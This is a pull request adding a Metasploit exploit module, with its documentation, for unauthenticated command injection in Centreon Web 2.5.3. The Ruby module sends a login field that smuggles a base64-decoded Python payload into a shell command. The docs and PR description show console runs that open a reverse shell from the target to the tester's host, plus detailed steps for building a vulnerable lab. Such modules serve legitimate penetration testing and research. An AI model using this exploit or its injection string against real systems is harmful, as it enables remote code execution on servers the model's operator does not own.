### PR TITLE
centreon useralias exec

### DIFF
--- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
+++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-  [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
-  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
+2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
 
 ### Creating A Testing Environment
 
@@ -21,49 +21,35 @@ Creating a testing environment for this application contained many steps, so I f
 
   1. Install the application
   2. Start msfconsole
-  3. Do: ```use exploit/linux/http/centreon_useralias_exec```
-  4. Do: ```set payload```
-  5. Do: ```set rhost```
-  6. Do: ```check```
-  ```
-  [+] Version Detected: 2.5.3
-  [*] 192.168.2.85:80 The target appears to be vulnerable.
-  ```
+  3. Do: `use exploit/linux/http/centreon_useralias_exec`
+  4. Do: `set payload`
+  5. Do: `set rhost`
+  6. Do: `check`
   7. Do: ```run```
   8. You should get a shell.
-  ```
-  [*] Started reverse TCP handler on 192.168.2.229:4444 
-  [*] Sending malicious login
-  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
-  whoami
-  www-data
-  uname -a
-  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-  ```
 
 ## Scenarios
 
-  Just a standard run.
+Just a standard run.
 
-  ```
-  msf > use exploit/linux/http/centreon_useralias_exec
-  msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
-  payload => cmd/unix/reverse_python
-  msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
-  lhost => 192.168.2.229
-  msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
-  rhost => 192.168.2.85
-  msf exploit(centreon_useralias_exec) > set verbose true
-  verbose => true
-  msf exploit(centreon_useralias_exec) > check
-  [+] Version Detected: 2.5.3
-  [*] 192.168.2.85:80 The target appears to be vulnerable.
-  msf exploit(centreon_useralias_exec) > exploit
-  [*] Started reverse TCP handler on 192.168.2.229:4444 
-  [*] Sending malicious login
-  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
-  whoami
-  www-data
-  uname -a
-  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-  ```
+    msf > use exploit/linux/http/centreon_useralias_exec
+    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
+    payload => cmd/unix/reverse_python
+    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
+    lhost => 192.168.2.229
+    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
+    rhost => 192.168.2.85
+    msf exploit(centreon_useralias_exec) > set verbose true
+    verbose => true
+    msf exploit(centreon_useralias_exec) > check
+    [+] Version Detected: 2.5.3
+    [*] 192.168.2.85:80 The target appears to be vulnerable.
+    msf exploit(centreon_useralias_exec) > exploit
+    [*] Started reverse TCP handler on 192.168.2.229:4444 
+    [*] Sending malicious login
+    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
+    whoami
+    www-data
+    uname -a
+    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+  

--- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
+++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
@@ -14,7 +14,7 @@ sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
 sudo add-apt-repository ppa:ondrej/php
 sudo apt-get install php5.6
 sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
-sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev
+sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
 sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
   select OK
   select No Configuration
@@ -188,4 +188,4 @@ Just a standard run.
     www-data
     uname -a
     Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-  
+```

--- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
+++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+  [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
+  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+### Creating A Testing Environment
+
+Creating a testing environment for this application contained many steps, so I figured I would document the process here.
+
+  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install.
+  2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
+  3. Enable php5.6 in Apache with ```a2enmod```, disable php7.0 with ```a2dismod```
+  4. Restart apache with ```apache2ctl restart```
+  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
+  6. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
+  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html#using-packages)
+  8. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
+  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/centreon_useralias_exec```
+  4. Do: ```set payload```
+  5. Do: ```set rhost```
+  6. Do: ```check```
+  ```
+  [+] Version Detected: 2.5.3
+  [*] 192.168.2.85:80 The target appears to be vulnerable.
+  ```
+  7. Do: ```run```
+  8. You should get a shell.
+  ```
+  [*] Started reverse TCP handler on 192.168.2.229:4444 
+  [*] Sending malicious login
+  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
+  whoami
+  www-data
+  uname -a
+  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+
+## Scenarios
+
+  Just a standard run.
+
+  ```
+  msf > use exploit/linux/http/centreon_useralias_exec
+  msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
+  payload => cmd/unix/reverse_python
+  msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
+  lhost => 192.168.2.229
+  msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
+  rhost => 192.168.2.85
+  msf exploit(centreon_useralias_exec) > set verbose true
+  verbose => true
+  msf exploit(centreon_useralias_exec) > check
+  [+] Version Detected: 2.5.3
+  [*] 192.168.2.85:80 The target appears to be vulnerable.
+  msf exploit(centreon_useralias_exec) > exploit
+  [*] Started reverse TCP handler on 192.168.2.229:4444 
+  [*] Sending malicious login
+  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
+  whoami
+  www-data
+  uname -a
+  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+  ```

--- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
+++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
@@ -7,16 +7,152 @@
 
 Creating a testing environment for this application contained many steps, so I figured I would document the process here.
 
-  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install.
+  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install. My user was `centreon`
   2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
-  3. Enable php5.6 in Apache with ```a2enmod```, disable php7.0 with ```a2dismod```
-  4. Restart apache with ```apache2ctl restart```
+```
+sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get install php5.6
+sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
+sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev
+sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
+  select OK
+  select No Configuration
+sudo apt-get install snmp-mibs-downloader
+```
+  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
+```
+a2enmod php5.6
+a2dismod php7.0
+```
+  4. Restart apache with `sudo apache2ctl restart`
   5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
-  6. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
-  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html#using-packages)
-  8. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
-  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html)
-
+```
+wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
+tar xvf nagios-plugins-2.1.1.tar.gz
+cd nagios-plugins-2.1.1/
+./configure
+make
+sudo make install
+```
+  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
+```
+cd ~
+git clone https://github.com/centreon/centreon-clib
+cd centreon-clib/build
+cmake .
+make
+sudo make install
+```
+  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
+```
+cd ~
+git clone https://github.com/centreon/centreon-broker
+cd centreon-broker/build/
+cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
+make
+sudo make install
+```
+  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
+```
+cd ~
+git clone https://github.com/centreon/centreon-engine
+cd centreon-engine/build/
+cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
+make
+sudo make install
+```
+  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
+```
+sudo mkdir /var/log/centreon-engine
+cd ~
+sudo pear install XML_RPC-1.4.5
+wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
+tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
+cd centreon-2.5.3
+sudo ./install.sh -i
+  <enter>
+  q
+  y
+  y
+  y
+  y
+  y
+  <enter>
+  y
+  <enter>
+  y
+  <enter>
+  y
+  <enter>
+  y
+  <enter>
+  y
+  <enter>
+  <enter>
+  <enter>
+  centreon
+  <enter>
+  /var/log/centreon-engine
+  /home/centreon/nagios-plugins-2.1.1/plugins
+  <enter>
+  /etc/init.d/centengine
+  /usr/local/bin/centengine
+  /usr/local/etc/
+  /usr/local/etc/
+  /etc/init.d/centengine
+  <enter>
+  y
+  y
+  y
+  <enter>
+  y
+  <enter>
+  <enter>
+  y
+  y
+  <enter>
+  y
+  y
+  <enter>
+  y
+  <enter>
+  <enter>
+  y
+  y
+```
+  10. Fix apache config
+```
+sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
+sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
+sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
+sudo a2enconf centreon
+sudo service apache2 reload
+```
+  11. Configure via website.  Browse to <ip>/centreon
+```
+next
+next
+select centreon-engine
+  /usr/local/lib/centreon-engine
+  /usr/local/bin/centenginestats
+  /usr/local/lib/centreon-engine
+  /usr/local/lib/centreon-engine
+  /usr/local/lib/centreon-engine
+  next
+select centreon-broker
+  /usr/local/lib/centreon-broker
+  /usr/local/lib/cbmod.so
+  /usr/local/lib/centreon-broker
+  /usr/local/lib/centreon-broker
+  /usr/local/lib/centreon-broker
+  next
+Pick whatever details about your user you want, next
+Fill in mysql Root password, next
+next
+next
+finish
+```
 ## Verification Steps
 
   1. Install the application

--- a/modules/exploits/linux/http/centreon_useralias_exec.rb
+++ b/modules/exploits/linux/http/centreon_useralias_exec.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'        => 'Centreon Web useralias Command Execution',
+        'Name'        => 'Centreon Web Useralias Command Execution',
         'Description' => %q(
           Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
           errors.  This functionality can be abused for arbitrary code

--- a/modules/exploits/linux/http/centreon_useralias_exec.rb
+++ b/modules/exploits/linux/http/centreon_useralias_exec.rb
@@ -8,11 +8,12 @@ require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
+  Rank = ExcellentRanking
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'        => 'Centreon v2.5.3 Unauthenticated Command Execution',
+        'Name'        => 'Centreon Web useralias Command Execution',
         'Description' => %q(
           Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
           errors.  This functionality can be abused for arbitrary code
@@ -21,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ),
         'Author'      =>
           [
-            'h00die <mike@shorebreaksecurity.com>',              # module
+            'h00die <mike@shorebreaksecurity.com>',         # module
             'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery
           ],
         'References'  =>
@@ -29,17 +30,9 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'EDB', '39501' ]
           ],
         'License'        => MSF_LICENSE,
-        'Platform'       => ['linux', 'unix'],
+        'Platform'       => ['python'],
         'Privileged'     => false,
-        'Arch'           => ARCH_CMD,
-        'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'python'
-            }
-        },
+        'Arch'           => ARCH_PYTHON,
         'Targets'        =>
           [
             [ 'Automatic Target', {}]
@@ -82,17 +75,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     begin
       vprint_status('Sending malicious login')
-      # normally the payload includes 'python -c "<shellcode>"', but since we are doing
-      # this via redirects, we want to strip that off
-      p_encoded = payload.encoded
-      p_encoded.slice! 'python -c "'
-      p_encoded = p_encoded[0...-1] # remove tailing quote
       send_request_cgi(
         'uri'       => normalize_uri(target_uri.path, 'index.php'),
         'method'    => 'POST',
         'vars_post'  =>
         {
-          'useralias'   => "$(echo #{Rex::Text.encode_base64(p_encoded)} |base64 -d | python)\\",
+          'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
           'password'    => Rex::Text.rand_text_alpha(5)
         }
       )

--- a/modules/exploits/linux/http/centreon_useralias_exec.rb
+++ b/modules/exploits/linux/http/centreon_useralias_exec.rb
@@ -1,0 +1,104 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Centreon v2.5.3 Unauthenticated Command Execution',
+        'Description' => %q(
+          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
+          errors.  This functionality can be abused for arbitrary code
+          execution, and can be triggered via the login screen prior to
+          authentication.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>',              # module
+            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39501' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'python'
+            }
+        },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 26 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'GET'
+      )
+      /LoginInvitVersion"><br \/>[\s]+(?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+<\/td>/ =~ res.body
+
+      if version_high && version_med && version_low && \
+         version_high.to_i <= 2 && \
+         version_med.to_i <= 5 && \
+         version_low.to_i <= 3
+        vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending malicious login')
+      # normally the payload includes 'python -c "<shellcode>"', but since we are doing
+      # this via redirects, we want to strip that off
+      p_encoded = payload.encoded
+      p_encoded.slice! 'python -c "'
+      p_encoded = p_encoded[0...-1] # remove tailing quote
+      send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'POST',
+        'vars_post'  =>
+        {
+          'useralias'   => "$(echo #{Rex::Text.encode_base64(p_encoded)} |base64 -d | python)\\",
+          'password'    => Rex::Text.rand_text_alpha(5)
+        }
+      )
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end

--- a/modules/exploits/linux/http/centreon_useralias_exec.rb
+++ b/modules/exploits/linux/http/centreon_useralias_exec.rb
@@ -56,13 +56,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'       => normalize_uri(target_uri.path, 'index.php'),
         'method'    => 'GET'
       )
-      /LoginInvitVersion"><br \/>[\s]+(?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+<\/td>/ =~ res.body
+      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
 
-      if version_high && version_med && version_low && \
-         version_high.to_i <= 2 && \
-         version_med.to_i <= 5 && \
-         version_low.to_i <= 3
-        vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
+      if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
+        vprint_good("Version Detected: #{version}")
         Exploit::CheckCode::Appears
       else
         Exploit::CheckCode::Safe


### PR DESCRIPTION
Adds exploit for Centreon web command injection as documented in [EDB 39501](https://www.exploit-db.com/exploits/39501/)

This application had many steps to get installed and working.  Please see the doc, as it will assist with links to get your environment installed.  I think it took me a little over an hour to install all the components and get the website to load.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] Do: `use exploit/linux/http/centreon_useralias_exec`
- [x] Do: `set payload`
- [x] Do: `set rhost`
- [x] Do: `set verbose true`
- [x] Do: `check`

```
  [+] Version Detected: 2.5.3
  [*] 192.168.2.85:80 The target appears to be vulnerable.
```
- [x] Do: `exploit`
- [x] **Verify** the thing does what it should

```
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending malicious login
  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
  whoami
  www-data
  uname -a
  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
